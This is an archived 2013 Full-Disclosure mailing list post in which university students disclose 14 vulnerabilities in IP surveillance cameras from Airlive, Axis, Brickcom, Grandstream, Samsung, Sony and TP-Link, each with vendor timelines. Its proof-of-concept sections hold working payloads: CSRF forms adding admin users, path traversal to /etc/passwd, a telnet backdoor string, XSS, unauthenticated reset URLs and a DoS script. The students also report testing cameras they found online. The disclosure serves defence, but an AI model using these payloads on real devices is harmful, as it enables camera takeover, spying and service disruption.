[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Security Analysis of IP video surveillance cameras
- To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Security Analysis of IP video surveillance cameras
- From: Javier Repiso Sánchez <javier.repiso@xxxxxxxxxxx>
- Date: Wed, 12 Jun 2013 10:19:16 +0200
Dear sirs,
We are a group of students from the European University of Madrid who have made
a security analysis of IP video surveillance cameras as the final project of
Security and Information Technology Master.
In total, we analyzed 9 different camera brands and we have found 14
vulnerabilities.
From these vulnerabilities, there are all kinds: simple vulnerabilities, such
as XSS or CRSF, and very harmful and dangerous vulnerabilities such as
privilege escalation or bypass authentication.
**Note that all the analysis we have done has been from cameras found through
Google dorks and Shodan, so we have not needed to purchase any of them for our
tests. Everything we needed was online.
In conclusion we can say that the vast majority of security cameras are not
ready to connect to an open network where everyone can get to access them.
We proceed to describe all previously reported vulnerabilities order by brands:
===========================================================================
AIRLIVE
====================================================================
===========================================================================
1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in this devices:
-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)
-CVE-2013-3541. Relative Path Traversal(CWE-23).
-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and
Access Controls(CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3691. Denial of Service
3.Affected Products
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD,
POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It’s possible others models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector.
This allows you to manipulate web interface parameters.
In the following example we will make a vector to create an alternative user
with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________
4.2.Relative Path Traversal
CVE-2013-3541, Transversal Path that’s allow you to read file system
configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________
4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64).
Now we can relogin like admin user and we have made the escalation privilege
4.4.Clear Text Storage of Sensitive Information
CVE-2013-3687 You can find all the sensitive information about the device in
plain text inside the backup file.
You can open with any text editor and look for user's information for example,
passwords, users and so on.
4.5.Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path ‘/’. A request with a large number
of ‘a’ can take down the http service from the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message, Conexion has been reset. After remove de adds
and refresh it you will get the next message, Can't Connect
It will be down for around 2min but if we are doing the request once and again
each 1min for example, the camera won’t recuperate ever itself
The following Python script could be used to test the DoS:
_____________________________________________________________________________
@ request = 'GET /' + ‘A’ * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ s.send(request)
@ response = s.recv(1024)
@ s.close()
_____________________________________________________________________________
5.Credits
-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez
and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jonás Ropero
Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the Airlive Customer Support of the
vulnerabilities. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the
vulnerabilities.
========================================================================
AXIS
====================================================================
========================================================================
1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
A vulnerability has been found in this devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618)
3.Affected Products
CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected
The vulnerability affects to the latest version of the software (6.2.10.11
which was released on October 19, 2012)
4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
In the vendor web, you could see that “AXIS Media Control is the recommended
method for viewing video images in Microsoft Internet Explorer.”
Vulnerability which can be exploited by remote malicious person to overwrite
arbitrary files with garbage data on a vulnerable system.
The vulnerability exists due to the ActiveX control including insecure
"StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in
"AxisMediaControlEmb.dll" DLL.
This can be exploited to corrupt or create arbitrary files in the context of
the current user.
In the following example we will corrupt regedit.exe using one of ActiveX
vulnerable methods:
When we click on one of the buttons, we could see that regedit.exe is
overwritten with garbage:
The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
<head>
<title></title>
<script language="javaScript" type="text/javascript">
function startRecord(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
MyActiveX.StartRecord(theFile);
}
function saveCurrentImage(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
var theFormat = 1;
MyActiveX.SaveCurrentImage(theFormat, theFile);
}
function startRecordMedia(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
var theFlags = 1;
var theMediaTypes = "default"
MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
}
</script>
</head>
<body>
<object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}"
style="width:640;height:480">
<param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg";>
<param name="MediaType" value="mjpeg">
<param name="Volume" value="1">
<param name="ShowStatusBar" value="1">
<param name="ShowToolbar" value="1">
<param name="AutoStart" value="1">
<param name="UIMode" value="ptz-relative">
<param name="MediaType" value="mjpeg-unicast">
<param name="StretchToFit" value="0">
< param name ='PTZControlURL'
value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi>
</object>
<br>
<INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
<INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
<INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
</body>
</html>
_____________________________________________________________________________
5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.
6.Report Timeline
-2013-05-24: Students team notifies the Axis Customer Support of the
vulnerability
-2013-05-24: Axis team asks for a report with technical information.
-2013-05-26: Technical details sent to Axis.
-2013-05-27: Axis team reports to the technical support to analyze the
vulnerability.
============================================================================
BRICKCOM
====================================================================
============================================================================
1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiples vulnerabilities have been found in this device.
-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of
Sensitive Information(CWE-312)
-CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges,
and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)
3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It’s possible others models are affected but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7,
v3.0.6.12, v3.0.6.16C1
In the next firmwares, you need to be log-in as administrator to download this
file, but the information is in plain text yet:
firmwareVersion=v3.1.0.8,v3.1.0.4
-CVE-2013-3690.
All firmware checked.
4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689, These allows you to download the all the configuration device
file writing the next URL (all data shown will be in plain text). It’s not
necessary any authentication.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________
The most interesting parameters could be:
UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***
4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation
CVE-2013-3690, CSRF is possible via POST method.
Also is possible a privilege escalation from a viewer user to an administrator
user.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector.
This allows you to manipulate web interface parameters.
The following request can exploit this vulnerability
_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi";
method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
5.Credits
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez
and Jonás Ropero Castillo.
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the Brickcom Customer Support of the
vulnerabilities.
-2013-05-31: Brickcom answers saying this in accordance with some of the
vulnerabilities, but there are some that they think is not correct.
(CVE-2013-3689, Authentication bypass and plain text information: After talk
with vendor, it’s looks that after firmware 3.1.x.x, this bug is fixed but
still the information is shown in plain text, so they should fix this second
one)
-2013-06-03: Students check and communicate Brickcom the detail products and
firmwares affected by vulnerabilities.
-2013-06-04: The vendor is agree with everything stated and reports that will
fix it as soon as possible.
===============================================================================
GRANDSTREAM
====================================================================
===============================================================================
1.Advisory Information
Title: Grandstream Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
The following vulnerability has been found in these devices:
-CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443)
-CVE-2013-3962. Cross Site Scripting(CWE-79)
-CVE-2013-3963. Cross Site Request Forgery(CWE-352) and Clickjacking(Capec-103)
3.Affected Products
The following product are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL,
GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500.
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963.
It’s possible others models are affected but they were not checked.
4.PoC
4.1.Backdoor in Telnet Protocol
CVE-2013-3542, Backdoor in Telnet Protocol
You should connect via telnet protocol to any camera affected (it's open by
default).
After all you should be introduce the magic string “ !#/ ” as Username and as
Password.
You will get the admin panel setting menu. If you type "help", the following
commands are shown:
=======================================================
help, quit, status, restart, restore, upgrade, tty_test
=======================================================
@@@ restore (Reset settings to factory default)
The attacker can take the device control, so it's make this devices very
vulnerables.
4.2.Cross Site Scripting (XSS)
CVE-2013-3962, Cross Site Scripting non-persistent.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________
4.3.Cross Site Request Forgery (CSRF)
CVE-2013-3963, CSRF via GET method.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector.
This allows you to manipulate web interface parameters.
You should introduce the following URL to replicate the attack.
_____________________________________________________________________________
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
_____________________________________________________________________________
5.Credits
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero
Castillo.
6.Report Timeline
-2013-05-31: Students opens a ticket in order to notify the Grandstream
Customer Support of the CVE-2013-3542.
-2013-05-31: Grandstream team reports to the technical support to analyze the
vulnerability.
-2013-06-11: Students opens a ticket in order to notify the Grandstream
Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities.
===========================================================================
SAMSUNG
====================================================================
===========================================================================
1.Advisory Information
Title: Samsung Series Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
The following vulnerability has been found in these devices:
-CVE-2013-3964. Cross Site Scripting(CWE-79)
3.Affected Products
CVE-2013-3964, the following product are affected: SHR-5162, SHR-5082
It’s possible others models are affected but they were not checked:
SHR-5XXX,SHR-516X,SHR-508X,SHR-5042,SHR-4160,SHR-4081,SHR-2XXX,SHR-216X,SHR-208X,SHR-204X
4.PoC
4.1.Cross Site Scripting (XSS)
CVE-2013-3964, Cross Site Scripting non-persistent.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________
5.Credits
CVE-2013-3964 ,was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-06-11: Students try to contact to Samsung Support Centre, but the service
is temporarily down.
===========================================================================
SONY
====================================================================
===========================================================================
1.Advisory Information
Title: Sony CH, DH Series Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
We have been found the next vulnerability in this devices
-CVE-2013-3539. Cross Site Request Forgery(CWE-352)
3.Affected Products
CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC
CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and
SNC DH280.
It’s possible others models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector.
This allows you to manipulate web interface parameters.
This is our .html attack.
_____________________________________________________________________________
<html>
<body>
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi";
method="POST">
<input type="Select" name="ViewerModeDefault" value="00000fff">
<input type="Hidden" name="ViewerAuthen" value="off">
<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
<input type="Hidden" name="User1" value="xxxx,c0000fff">
<input type="Hidden" name="User2" value="xxxx,c0000fff">
<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
<input type="Hidden" name="User4" value="Og==,00000fff">
<input type="Hidden" name="User5" value="Og==,00000fff">
<input type="Hidden" name="User6" value="Og==,00000fff">
<input type="Hidden" name="User7" value="Og==,00000fff">
<input type="Hidden" name="User8" value="Og==,00000fff">
<input type="Hidden" name="User9" value="Og==,00000fff">
<input type="Hidden" name="Reload" value="referer">
<script>document.SonyCsRf.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
Now we can check that we have a new user in the configuration.
5.Credits
CVE-2013-3539 was discovered by Jonás Ropero Castillo. .
6.Report Timeline
-2013-05-25: Students team notifies the Sony Customer Support of the
vulnerability. No reply received.
===========================================================================
TP-LINK
====================================================================
===========================================================================
1.Advisory Information
Title: TP-LINK TL-SC3171 Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
The next vulnerability has been found in this device:
-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with
Unnecessary Privileges(CWE-250).
3.Affected Products
-CVE-2013-3688. The following product are affected: TP-LINK TL-SC3171
It’s possible others models are affected but they were not checked.
4.PoC
4.1.Execute Remote Command bypassing authentication
CVE-2013-3688, Execute Remote Command bypassing authentication.
We have found that is possible to reboot this kind of devices remotely. The
attack vector is the following one:
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/reboot
http://xx.xx.xx.xx/cgi-bin/hardfactorydefault
_____________________________________________________________________________
In the first one you will get blank page and you can’t re-login until the
device is reboot.
In the second one, you will get a victory message and of course, in the next
login you should introduce factory settings.
5.Credits
-CVE-2013-3688, was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez
and Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the TP-Link Customer Support of the
vulnerability. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability
before and this has been corrected in a new beta firmware version.
-2013-06-04: Students answer to the vendor saying that this vulnerability is
different from the Coresecurity vulnerabilities.
-2013-06-05: TP-Link answers saying this vulnerability is the same as the
vulnerability reported by Coresecurity.
-2013-06-05: Students respond by explaining the details of the vulnerability
and confirming that the vulnerability is different.
-2013-06-06: TP-Link answer confirming that the vulnerability is fixed with the
latest patch for the reported vulnerabilities generated by Coresecurity. The
beta version is available on the website of TP-Link
AUTHORS
Eliezer Varadé Lopez
Javier Repiso Sánchez
Jonás Ropero Castillo
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/